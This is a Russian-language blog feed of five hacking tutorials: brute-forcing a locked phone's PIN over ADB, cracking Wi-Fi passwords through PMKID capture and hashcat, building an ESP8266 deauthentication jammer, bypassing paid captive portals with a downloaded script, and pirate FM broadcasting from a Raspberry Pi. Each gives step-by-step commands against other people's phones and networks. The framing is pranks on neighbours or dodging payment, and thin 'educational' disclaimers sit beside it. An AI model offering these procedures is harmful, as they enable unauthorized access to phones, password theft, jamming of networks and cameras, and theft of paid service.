Aferium

Взлом пин-кода на смартфоне 📞

2022-03-31T22:00:54.073Z

В этой статье пойдёт речь о том, как получить доступ к заблокированному телефону не зная пароль.

Дисклеймер.

Автор статьи не несёт ответственности за действия, описываемые в данной статье. Всё что показано, сделано в сугубо образовательных целях. Делайте всё на свой страх и риск.

Данный метод также работает с телефонами apple.

Установка и запуск скрипта в Kali Linux

Для начала обновляем пакеты и сам репозиторий:

apt update && apt upgrade

git clone https://github.com/tegal1337/CiLocks

Далее вводим следующие команды:

cd CiLocks

chmod +x cilocks

sudo bash cilocks

Соединение телефона с компьютером по WI-FI

Для этого нам потребуется узнать ip нужного телефона. Это сделать можно просканировав сеть любым ip сканером. Я воспользовался этим.

Находим нужный ip адрес и копируем его.

Далее вводим команды:

adb connect (ip телефона)

adb devices

*Если в списке есть ip телефона, то все хорошо

Процесс взлома

Открываем скрипт

./cilocks

Теперь осталось выбрать 4-х или 6-значный код. Нажимаем цифру 2 или 3 и ждем, пока скрипт подберет пароль.

СПАСИБО ЗА ПРОЧТЕНИЕ СТАТЬИ! ЕЩЕ БОЛЬШЕ СВЕЖЕГО МАТЕРИАЛА ВЫ МОЖЕТЕ НАЙТИ В ТЕЛЕГРАМ КАНАЛЕ

Следите за мной в соц-сетях:

• Tik-Tok: aferium

• Группа ВК: aferium_vk

• Телеграм: aferium

• Яндекс Дзен: aferium

• VC.RU: aferium

• Teletype: aferium

Взламываем WiFi с помощью PMKID

2022-03-28T12:21:57.168Z

Здравствуйте. Сегодня расскажу вам про то, как взломать WiFI с помощью PMKID.

Дисклеймер.

Зачем нужен PMKID запрос от маршрутизатора?

Раньше вам приходилось ждать, когда пользователь подключится к точке доступа, чтобы вы могли захватить рукопожатие. Этот метод больше не требует этого, для поиска учетных данных пароля. Эта атака работает на надежном информационном элементе сети безопасности (RSN-IE).

Установка и настройка

Шаг 1 - Загрузим и установим Hcxdumptool.

Сначала вам нужно скачать hcxtools, с сайта GitHub:

git clone https://github.com/ZerBea/hcxtoolsgit clone https://github.com/ZerBea/hcxdumptool

После успешной загрузки, установим hcxdumptools.
Для этого перейдем в каталог hcxdumptools

cd hcxdumptools

Затем пишем поочередно:

makemake install

Затем переходим в каталог hcxtools и так же устанавливаем:

cd hcxtoolsmake make install

Шаг 2 - Переводим беспроводной адаптер в режим монитора

Запускаем airmon-ng и командой ниже переводим адаптер в режим монитора

airmon-ng start wlan0

После запуска, название вашей беспроводной карты будет изменено с wlan0 на wlan0mon.

Теперь запустим airodump-ng на беспроводном адаптере в режиме монитора.

airodump-ng wlan0mon

Шаг 3 - Запустим hcxdumptool для захвата PMKID

Следующим шагом является использование hcxdumptool для получения PMKID, который предварительно содержит общий ключ или пароль.

hcxdumptool -i wlan0mon -o Hackers-ArisePMKID –enable_status=1

Выполните команду и подождите. В некоторых случаях на снятие всех PMKID может уйти несколько часов.

Шаг 4 - Удалите все посторонние данные в PMKID

PMKID содержит хэш PSK, а также другую информацию, которая вам не нужна. Вы должны удалить данные, оставшиеся только с хешем PSK, прежде чем начинать взламывать хеш.

Перейдите в каталог hcxtool.

cd hcxtools

Теперь вы используете hcxcaptool, чтобы удалить всю остальную информацию из файла, оставив только хеш PSK.

hcxcaptool -z hashoutput.txt HackersArisePMKID

Это оставит вам хеш PSK в файле с именем hashoutput.txt.

Шаг 5 - Взломайте хеш

Последний шаг — взломать хеш. Чтобы его взломать, мы должны использовать hashcat, используя в качестве списка слов 100 самых популярных паролей.

hashcat -m 16800 hashoutput.txt top10000password.txt

m 16800 обозначает тип хеша.

Hashoutput.txt - это файл, содержащий вырезанный хеш PSK.

To10000passwords.txt - это текстовый файл, содержащий 10 000 наиболее часто используемых паролей.

Вот и всё. Теперь вы знаете, как взломать WiFi при помощи PMKID и сможете обезопасить свою сеть и сети своих близких.

СПАСИБО ЗА ПРОЧТЕНИЕ СТАТЬИ! ЕЩЕ БОЛЬШЕ СВЕЖЕГО МАТЕРИАЛА ВЫ МОЖЕТЕ НАЙТИ В ТЕЛЕГРАМ КАНАЛЕ

Следите за мной в соц-сетях:

• Tik-Tok: aferium

• Группа ВК: aferium_vk

• Телеграм: aferium

• Яндекс Дзен: aferium

• VC.RU: aferium

• Teletype: aferium

WI-FI ГЛУШИЛКА ЗА 150 РУБ! 🕸

2022-03-27T12:03:16.415Z

Wi-Fi jammer, или глушилка Wi-Fi, — это гаджет, который предназначен для отключения беспроводных устройств от хотспота.

Зачем это нужно? Можешь вообразить себе как дружеский розыгрыш (сосед, конечно, обрадуется, когда ты оборвешь его порноролик или, например, футбольный матч на самом интересном месте),

Так и криминальное применение: злоумышленник может отключить от сети камеры слежения или другое важное оборудование. Что вам не советую!

ДИСКЛЕЙМЕР:

Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!

Как работает глушилка?

В отличие от настоящих глушилок, которые перебивают сигнал радиопередатчика своим более сильным сигналом, деаутентификатор работает на программном уровне. Он реализует атаку типа «отказ в обслуживании», отправляя на роутер фрейм деаутентификации от имени подключенных к сети устройств. Поскольку этот фрейм никак не шифруется, глушилке достаточно выведать MAC-адреса устройств, поснифав трафик в сети.

Обычно деаутентификация — это часть комплексной атаки на сеть. Она используется при создании «злого двойника» точки доступа либо для перехвата хендшейка, что затем позволяет расшифровать пароль. Однако глушилка может быть полезной и сама по себе.

Установка ПО

Начнем с Deauther 2.0 — той самой прошивки, которую разработал Spacehuhn. В его репозитории на GitHub ты можешь выбрать версию для конкретной платы.

Файлы с расширением bin — это скомпилированные скетчи. Их нужно устанавливать на плату через специальный загрузчик. Но если захочешь, то в архивах с исходным кодом ты отыщешь библиотеки и скетчи, которые можно поставить через Arduino IDE.

Загрузка .bin

Если ты выбрал вариант с загрузкой бинарника, то для начала запускай программу NodeMCU Flasher. Скачать ее можно в репозитории NodeMCU.

Устанавливаем драйверы для CP2102 либо для CH340. После этого подключаем плату к компьютеру, открываем программу NodeMCU Flasher, выбираем порт COM в диспетчере устройств в разделе «Порты (COM и LPT)».

Теперь переходим во вкладку Config, жмем на шестеренку и выбираем скачанный файл .bin

Программа для прошивки

После добавления файла в строке слева появится его путь. Переходи во вкладку Operation и нажимай на Flash — прошивка после этого будет загружена в плату.

Загрузка через Arduino IDE.

Если тебе удобнее устанавливать через Arduino IDE, то процесс слегка другой. Первым делом точно так же качаем драйвер (CH340).

Затем открываем Arduino IDE и в меню «Файл» ищем «Настройки», нажимаем на «Добавление ссылки для менеджера плат» и вставляем две ссылки:

Добавление ссылок

Открываем вкладку «Инструменты» и выбираем пункт «Менеджер плат» из меню «Плата: …».

Добавление плат

Выбираем «Внесены» и устанавливаем arduino-esp-8266-deauther и esp8266.

Установка пакетов

Открываем папку со скетчем и библиотеками, переходим в «Инструменты». Настройки должны стоять как у меня на скриншоте.

В строке «Плата» выбирай из списка ESP8266 Deauther Modules.

Загрузка прошивки

В строке Flash size выбираем модуль CH340.

Версии модулей

Далее загружаем прошивку.

После включения плата создаст точку доступа. Подключайся к ней и заходи по адресу 192.168.4.1 или deauth.me. Ты попадешь в конфигуратор и увидишь предупреждение.

Предупреждение

В разделе конфигурации в строке LANG указываем ru для включения русского языка в веб-интерфейсе. Чтобы настройки вступили в силу, нужно нажать на «Сохранить» и перезагрузить устройство. Теперь оно готово к работе, можно начинать портить жизнь соседям.

СПАСИБО ЗА ПРОЧТЕНИЕ СТАТЬИ! ЕЩЕ БОЛЬШЕ СВЕЖЕГО МАТЕРИАЛА ВЫ МОЖЕТЕ НАЙТИ В ТЕЛЕГРАМ КАНАЛЕ

Следите за мной в соц-сетях:

• Tik-Tok: aferium

• Группа ВК: aferium_vk

• Телеграм: aferium

• Яндекс Дзен: aferium

• VC.RU: aferium

• Teletype: aferium

Обход авторизации Wi-fi с гостевым доступом

2022-03-25T17:04:48.493Z

В повседневной жизни мы часто сталкиваемся ситуацией, когда нам нужно получить доступ в интернет. В кафе, ресторане или в каком-то другом общественном месте практически всегда мы можем найти точку доступа.

Нередко нам попадаются роутеры с «гостевым доступом».

Но бывает, что бесплатный Wi-Fi имеет защиту Captive Portal .

Другими словами, имеется открытая сеть Wi-Fi сеть, к которой мы можем подключиться без использования пароля, но при каждой нашей попытке зайти на интернет ресурс, нас будут перенаправлять на страницу, где необходимо будет ввести учётные данные, оплатить, подтвердить номер телефона с помощью СМС или что-нибудь ещё для того, чтобы мы смогли авторизоваться и пользоваться интернетом.

Конечно не у каждого есть желание оплачивать такую услугу, поэтому мы будем использовать утилиту, которая будет обходить данную защиту.

ДИСКЛЕЙМЕР:

Приступим

Нужно зайти в терминал и прописать команды для установки

hack-captive-portals

sudo pkg -y install sipcalc nmap

wget https://raw.githubusercontent.com/systematicat/

hack-captive-portals/master/hack-captive.sh

sudo chmod u+x hack-captive.sh

sudo ./hack-captive.sh

Использование

sudo ./hack-captive.sh

После фразы "Pwned! Now you can surf the Internet!" вы сможете пользоваться интернетом.

СПАСИБО ЗА ПРОЧТЕНИЕ СТАТЬИ! ЕЩЕ БОЛЬШЕ СВЕЖЕГО МАТЕРИАЛА ВЫ МОЖЕТЕ НАЙТИ В ТЕЛЕГРАМ КАНАЛЕ

Следите за мной в соц-сетях:

• Tik-Tok: aferium

• Группа ВК: aferium_vk

• Телеграм: aferium

• Яндекс Дзен: aferium

• VC.RU: aferium

• Teletype: aferium

ВЗЛОМ ЛЮБОГО РАДИО 📻

2022-03-24T22:57:58.688Z

Всем доброго времени суток! Сегодня мы сделаем с вами из любой малинки маленькую "FM станцию".

Вы сможете транслировать любую музыку, свой голос на любой FM частоте!

Прежде чем прочесть эту статью, вам следует прикупить все нужное оборудование. Ибо без этого у вас ничего не выйдет

ДИСКЛЕЙМЕР:

Начало

В качестве антенны можно использовать провод, либо джампер. Вставлять необходимо в GPIO4 (отмечено на рисунке). Расположение GPIO будет таким же на разных моделях.

Вот такой простой дуопоинт можно использовать

Теперь необходимо установить на SD карточку Raspberry OS(именно её, с kali не получилось ввиду отсутствия нужных пакетов). Об этом не раз мы писали в статьях, подробную информацию найдёте.

Ссылка на прошивку: Скачать

разархивируем образ после скачивания, заливаем его на sd карточку( 8 гб и более) через balenaetcher.

После того, как ОС установилась, ищем раздел boot (раздел SD карты) и создаем в корне раздела два файла:

ssh
wpa_supplicant.conf

Файл ssh нужен для старта ssh-сервера. Его оставляем пустым. А вот в файл wpa_supplicant.conf помещаем настройки для подключения к Wi-Fi сети:

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev

update_config=1

country=RU

network={

ssid="nazvanie"

psk="12345"

key_mgmt=WPA-PSK

}

меняем название и пароль для вашей wi-fi точки, к которой необходимо подключиться.

Вставляем карту в малину, подключаемся по ssh через putty:

Логин: pi

Пароль: raspberry

Теперь создадим отдельный каталог и перейдём в него:

mkdir PI_FM
cd PI_FM

после этого прописываем команду на клонирование репозитория:

sudo git clone https://github.com/markondej/fm_transmitter

Теперь установим компилятор C для запуска:

sudo apt-get install gcc g++ make

Теперь мы можем скомпилировать программу. Для этого войдите в загруженный каталог и скомпилируйте с помощью команд:

cd fm_transmitter
sudo make

Готово!

Теперь будем запускать вещание. При запуске программы мы должны указать частоту, на которой мы хотим транслировать, и название аудиофайла, который мы хотим воспроизвести. По умолчанию там будет аудио-файл, загруженный вместе с программой под названием acoustic_guitar_duet.wav

Запустим вещание на частоте 100 Мгц:

sudo ./fm_transmitter -f 100  -r acoustic_guitar_duet.wav

Всё, можно настроить приёмник на выбранную вами частоту и услышать процесс работы)

Передатчик будет работать только с аудиофайлами формата .wav

Что бы закинуть свои файлы, можно из под линукса зайти в раздел rootfs:

/home/pi/PI_FM/

закидываем сюда wav или mp3 файлы, после чего открываем консоль в этой папке (F4), и прописываем команду:

cp pesnya.mp3 /fm_transmitter/

Так как подходят для воиспроизведения только wav, есть выход, что бы запускать mp3 файлы.

скачиваем конвертер:

sudo apt-get install sox libsox-fmt-mp3

соглашаемся со всеми требованиями. После окончания установки, убедитесь что находитесь в каталоге fm_transmitter и что в папке находится ваш mp3 файл.

Теперь конвертируем его в wav:

sudo sox my-audio.mp3 -r 44100 -c 1 -b 16 -t wav my-converted-audio.wav

теперь мы можем запустить трансляцию конвертированного mp3 файла в wav:

sudo ./fm_transmitter -f 100.0 my-converted-audio.wav

Трансляция голоса в эфир в реальном времени

Для начала вам необходимо подключить через переходник USB микрофон к малине. После этого прописываем следующую команду:

arecord -D hw:1,0 -c 2 -d 0 -r 22050 -f S16_LE | sudo ./fm_transmitter -f 100 -

Готово! теперь на выбранной вами частоте вы сможете услышать свой голос.

Для повторной трансляции голоса, необходимо "убить" процесс:

pkill -9 arecord

Необходимые оборудования:

СПАСИБО ЗА ПРОЧТЕНИЕ СТАТЬИ! ЕЩЕ БОЛЬШЕ СВЕЖЕГО МАТЕРИАЛА ВЫ МОЖЕТЕ НАЙТИ В ТЕЛЕГРАМ КАНАЛЕ

Следите за мной в соц-сетях:

• Tik-Tok: aferium

• Группа ВК: aferium_vk

• Телеграм: aferium

• Яндекс Дзен: aferium

• VC.RU: aferium

• Teletype: aferium